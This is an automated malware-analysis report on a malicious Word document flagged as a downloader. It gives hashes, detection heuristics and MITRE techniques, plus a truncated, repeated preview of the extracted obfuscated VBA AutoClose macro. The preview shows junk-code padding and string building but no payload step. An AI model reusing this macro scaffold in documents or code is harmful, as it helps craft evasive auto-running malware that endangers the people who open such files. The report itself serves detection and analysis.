Office (OLE) malware analysis — malicious · 4d985f8db00a9d24

MALICIOUS

Office (OLE)

212.0 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 2b2d53b2acfe68c2aa9c1266bf3ee6cf SHA-1: 42353cd66979484bfce1be0a9cefc14fb70dc8f5 SHA-256: 4d985f8db00a9d244dd51ec8f1c54cd381109f208453f5c48181b6ee078c80ad

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Downloader.Valyria-6595163-0. Static analysis revealed a legacy WordBasic AutoClose macro, which is a known indicator of malicious documents. The presence of GetObject calls within the macro further suggests an attempt to execute arbitrary code, likely for downloading and running a secondary payload. The macro's obfuscated nature and the lack of clear network indicators prevent a more specific family attribution.

Heuristics 7

ClamAV: Doc.Downloader.Valyria-6595163-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 44733 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	44733 bytes
SHA-256: `e2b6454feec665442ab992d021eb0570ffbc61602f53b4a7f098a77f96adfc71`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoClose() Dim teVewYSaFaliKUCaMy teVewYSaFaliKUCaMy = 76522 Dim lYcUlIwoZiDSuWaVyJ For lYcUlIwoZiDSuWaVyJ = 6 To 13 Dim HoXOZuFejYbuSOxyNAdEZ HoXOZuFejYbuSOxyNAdEZ = Fix(7055) Next hUgumaDaZEg = "synOvIqiSYramYVo" On Error Resume Next XAHeTOVIjEDA = "ocYSySeDySyn" Dim lAwOnaxCuc For lAwOnaxCuc = 6 To 11 Dim loVohmIhI loVohmIhI = Fix(72508) Next Dim lUJoMoBaju For lUJoMoBaju = 2 To 12 Dim KUsiVOLETUPOrEs KUsiVOLETUPOrEs = Fix(48415) Next Dim LukEzETUGuHEteZUxUzAv LukEzETUGuHEteZUxUzAv = 76075 sULlOcyPYqAcowIX = 26805 BiZYpamYlixeXoWaJyh = "HumaxuFeWiEpyCahU" tALeCirEtyKE = Val("93648") & "haiIliJisAkIfuZOmItOLY" wiDoQoQihywywoQAteF = "hJokoGOjItAWi" WeLOQyRiYVIBOcUcIZAR = "iuTanEZAZUheTiIfPu" hosedOCUdIsyLiz = Val("73490") & "aYheCynuYmuZU" vAcuiEaYCAG = 20221 BytEtZYdAsefA = 39154 qHaMOJAsESeXA = 32743 guVEDUgiaowiz = "zidIaIxek" beCafofaXInUNELA = Val("29635") & "JyvUHydAiXOioROaOz" bESOgAKizIfelO = StrReverse("") GIvILoxiuSARIPugi = Val("99760") & "CiQTTiZiBAgiloj" ralobirYFYZYKeC = "JAikaaadaVACA" ZuzaJonemaWAruWIVA = 29094 niNUjtuFoJOFriV = 87557 DizAgOhaWyDODaC = "ziepEjiPz" Dim qEhERUJKekyaEsatISERU For qEhERUJKekyaEsatISERU = 5 To 12 Dim hEledoPIJACYgaXoJE SLUcivOj = Val("6817") & "GaPIsOjuSIraW" Dim fJbOLiCiplIgYMI For fJbOLiCiplIgYMI = 2 To 10 Dim PaduhucyNOWigYda PaduhucyNOWigYda = Fix(16045) Next PULUaifoJEN = "iiRiqIjyvU" hEledoPIJACYgaXoJE = Fix(26055) Dim keaEnuGiPeWduxeBaA keaEnuGiPeWduxeBaA = 98915 Next Dim GASYaYSIpio SUZupEAZacO = 56839 kOwAGojev = Val("45389") & "MYSuaoDaqOBe" Dim iumIgabAzEl iumIgabAzEl = 88301 GASYaYSIpio = 45701 liXESfYk = 600 FirYdyCuQYtaLY = 14401 Dim GUiYiywEGOMYm For GUiYiywEGOMYm = 5 To 13 Dim checElyGY checElyGY = Fix(22955) Next rElYsIwAveiyG = "mogobUhYR" Dim myjINOwUWA For myjINOwUWA = 3 To 10 Dim vAVANiWeQaFaNi vAVANiWeQaFaNi = Fix(80231) Next ZaNaJIvYlAdYwatEzukemY = "relUJquZUXO" Dim JUQUasyqeVq JUQUasyqeVq = 88436 wuwYtiVyhubyc = Val("61578") & "ZliQwoRUZopaqalU" Dim qpOtOtEBoMERizuN qpOtOtEBoMERizuN = 83432 Dim ryGETUPYxei For ryGETUPYxei = 6 To 10 Dim cEvyCYqypUhI cEvyCYqypUhI = Fix(35661) Next Dim fyvoMOxuxT For fyvoMOxuxT = 1 To 12 Dim TYzaSEfex TYzaSEfex = Fix(55508) Next Dim aYwuRleliBIsyFU For aYwuRleliBIsyFU = 0 To 12 Dim HYuzEvEaeRYjaCdatiGy HYuzEvEaeRYjaCdatiGy = Fix(66424) Next Dim NaKaTybyTSihiZElugiQy For NaKaTybyTSihiZElugiQy = 5 To 10 Dim aedoTEniFejIvYVODIWO aedoTEniFejIvYVODIWO = Fix(84109) Next bqeZoBiupIieiocE = 40507 Dim XUxaPYMECEcOSaiOROZAr For XUxaPYMECEcOSaiOROZAr = 7 To 11 Dim qeCaxOTgitYQs qeCaxOTgitYQs = Fix(34970) Next iEraNujUBEk = "voPXorIvUNAjipAD" gonYbegfYmUsUbYls = Val("6847") & "TycUkILoJeCokYLI" TaXEnaASIJYceqiM = "asIwapiXifAiIBuHAHy" KEzValOryWAzyvYzegd = 82659 guNYsaxujEtYRET = 85219 FYdYsEsEFOQJYgAgES = Val("24035") & "NiTAwoQerO" Dim wIkeHEgabYTe For wIkeHEgabYTe = 8 To 11 Dim ZyTaqisIHUqyVEVacOsIj ZyTaqisIHUqyVEVacOsIj = Fix(19698) Next NYBexawAjapoz = "tutoZYCeZtukYPIvANijE" Dim xaBoCUpyQovanapIlEfaX For xaBoCUpyQovanapIlEfaX = 4 To 10 Dim iemowYFOKOtpuxy ciaurageQUcOiEWOTizuTO = Val("7442") & "XaiIGoVOaixYm" TUiALyzigS = "gxIWEtoCGuZEieXOtuxi" QyrAiuWEBYf = 97778 iemowYFOKOtpuxy = Fix(64083) Next GOHUQYTIRAf = Val("15204") & "qavVudizIPajjUbO" duNoRIgia = 87009 bESOgAKizIfelO = bESOgAKizIfelO + IIf((262 + 524) = 786, "s", "Q") Dim TAdOSiRIViaedxYJykAG For TAdOSiRIViaedxYJykAG = 0 To 12 Dim wiJUCEsuLEAlExAt wiJUCEsuLEAlExAt = Fix(51411) Next Dim WUcyQiemaRIHasYBid WUcyQiemaRIHasYBid = 33966 Dim haPufywIHyWIB For haPufywIHyWIB = 2 To 12 Dim JEVYsEXuTySeEsiSoTEB JEVYsEXuTySeEsiSoTEB = 82350 Di ... (truncated)

SHA-256: e2b6454feec665442ab992d021eb0570ffbc61602f53b4a7f098a77f96adfc71

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
Dim teVewYSaFaliKUCaMy
teVewYSaFaliKUCaMy = 76522
Dim lYcUlIwoZiDSuWaVyJ
For lYcUlIwoZiDSuWaVyJ = 6 To 13
   Dim HoXOZuFejYbuSOxyNAdEZ
   HoXOZuFejYbuSOxyNAdEZ = Fix(7055)
Next
hUgumaDaZEg = "synOvIqiSYramYVo"
On Error Resume Next

XAHeTOVIjEDA = "ocYSySeDySyn"

Dim lAwOnaxCuc
For lAwOnaxCuc = 6 To 11
   Dim loVohmIhI
   loVohmIhI = Fix(72508)
Next
Dim lUJoMoBaju
For lUJoMoBaju = 2 To 12
   Dim KUsiVOLETUPOrEs
   KUsiVOLETUPOrEs = Fix(48415)
Next
Dim LukEzETUGuHEteZUxUzAv
LukEzETUGuHEteZUxUzAv = 76075
sULlOcyPYqAcowIX = 26805
BiZYpamYlixeXoWaJyh = "HumaxuFeWiEpyCahU"
tALeCirEtyKE = Val("93648") & "haiIliJisAkIfuZOmItOLY"
wiDoQoQihywywoQAteF = "hJokoGOjItAWi"
WeLOQyRiYVIBOcUcIZAR = "iuTanEZAZUheTiIfPu"


hosedOCUdIsyLiz = Val("73490") & "aYheCynuYmuZU"
vAcuiEaYCAG = 20221
BytEtZYdAsefA = 39154
qHaMOJAsESeXA = 32743
guVEDUgiaowiz = "zidIaIxek"

beCafofaXInUNELA = Val("29635") & "JyvUHydAiXOioROaOz"
bESOgAKizIfelO = StrReverse("")
GIvILoxiuSARIPugi = Val("99760") & "CiQTTiZiBAgiloj"

ralobirYFYZYKeC = "JAikaaadaVACA"
ZuzaJonemaWAruWIVA = 29094
niNUjtuFoJOFriV = 87557
DizAgOhaWyDODaC = "ziepEjiPz"
Dim qEhERUJKekyaEsatISERU
For qEhERUJKekyaEsatISERU = 5 To 12
   Dim hEledoPIJACYgaXoJE
SLUcivOj = Val("6817") & "GaPIsOjuSIraW"
Dim fJbOLiCiplIgYMI
For fJbOLiCiplIgYMI = 2 To 10
   Dim PaduhucyNOWigYda
   PaduhucyNOWigYda = Fix(16045)
Next
PULUaifoJEN = "iiRiqIjyvU"
   hEledoPIJACYgaXoJE = Fix(26055)
Dim keaEnuGiPeWduxeBaA
keaEnuGiPeWduxeBaA = 98915
Next
Dim GASYaYSIpio
SUZupEAZacO = 56839
kOwAGojev = Val("45389") & "MYSuaoDaqOBe"
Dim iumIgabAzEl
iumIgabAzEl = 88301
GASYaYSIpio = 45701


liXESfYk = 600
FirYdyCuQYtaLY = 14401
Dim GUiYiywEGOMYm
For GUiYiywEGOMYm = 5 To 13
   Dim checElyGY
   checElyGY = Fix(22955)
Next
rElYsIwAveiyG = "mogobUhYR"
Dim myjINOwUWA
For myjINOwUWA = 3 To 10
   Dim vAVANiWeQaFaNi
   vAVANiWeQaFaNi = Fix(80231)
Next

ZaNaJIvYlAdYwatEzukemY = "relUJquZUXO"

Dim JUQUasyqeVq
JUQUasyqeVq = 88436
wuwYtiVyhubyc = Val("61578") & "ZliQwoRUZopaqalU"
Dim qpOtOtEBoMERizuN
qpOtOtEBoMERizuN = 83432

Dim ryGETUPYxei
For ryGETUPYxei = 6 To 10
   Dim cEvyCYqypUhI
   cEvyCYqypUhI = Fix(35661)
Next
Dim fyvoMOxuxT
For fyvoMOxuxT = 1 To 12
   Dim TYzaSEfex
   TYzaSEfex = Fix(55508)
Next
Dim aYwuRleliBIsyFU
For aYwuRleliBIsyFU = 0 To 12
   Dim HYuzEvEaeRYjaCdatiGy
   HYuzEvEaeRYjaCdatiGy = Fix(66424)
Next

Dim NaKaTybyTSihiZElugiQy
For NaKaTybyTSihiZElugiQy = 5 To 10
   Dim aedoTEniFejIvYVODIWO
   aedoTEniFejIvYVODIWO = Fix(84109)
Next
bqeZoBiupIieiocE = 40507
Dim XUxaPYMECEcOSaiOROZAr
For XUxaPYMECEcOSaiOROZAr = 7 To 11
   Dim qeCaxOTgitYQs
   qeCaxOTgitYQs = Fix(34970)
Next
iEraNujUBEk = "voPXorIvUNAjipAD"
gonYbegfYmUsUbYls = Val("6847") & "TycUkILoJeCokYLI"
TaXEnaASIJYceqiM = "asIwapiXifAiIBuHAHy"
KEzValOryWAzyvYzegd = 82659
guNYsaxujEtYRET = 85219

FYdYsEsEFOQJYgAgES = Val("24035") & "NiTAwoQerO"
Dim wIkeHEgabYTe
For wIkeHEgabYTe = 8 To 11
   Dim ZyTaqisIHUqyVEVacOsIj
   ZyTaqisIHUqyVEVacOsIj = Fix(19698)
Next
NYBexawAjapoz = "tutoZYCeZtukYPIvANijE"
Dim xaBoCUpyQovanapIlEfaX
For xaBoCUpyQovanapIlEfaX = 4 To 10
   Dim iemowYFOKOtpuxy
ciaurageQUcOiEWOTizuTO = Val("7442") & "XaiIGoVOaixYm"
TUiALyzigS = "gxIWEtoCGuZEieXOtuxi"
QyrAiuWEBYf = 97778
   iemowYFOKOtpuxy = Fix(64083)
Next
GOHUQYTIRAf = Val("15204") & "qavVudizIPajjUbO"
duNoRIgia = 87009
 bESOgAKizIfelO = bESOgAKizIfelO + IIf((262 + 524) = 786, "s", "Q")
Dim TAdOSiRIViaedxYJykAG
For TAdOSiRIViaedxYJykAG = 0 To 12
   Dim wiJUCEsuLEAlExAt
   wiJUCEsuLEAlExAt = Fix(51411)
Next
Dim WUcyQiemaRIHasYBid
WUcyQiemaRIHasYBid = 33966
Dim haPufywIHyWIB
For haPufywIHyWIB = 2 To 12
Dim JEVYsEXuTySeEsiSoTEB
JEVYsEXuTySeEsiSoTEB = 82350
Di
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.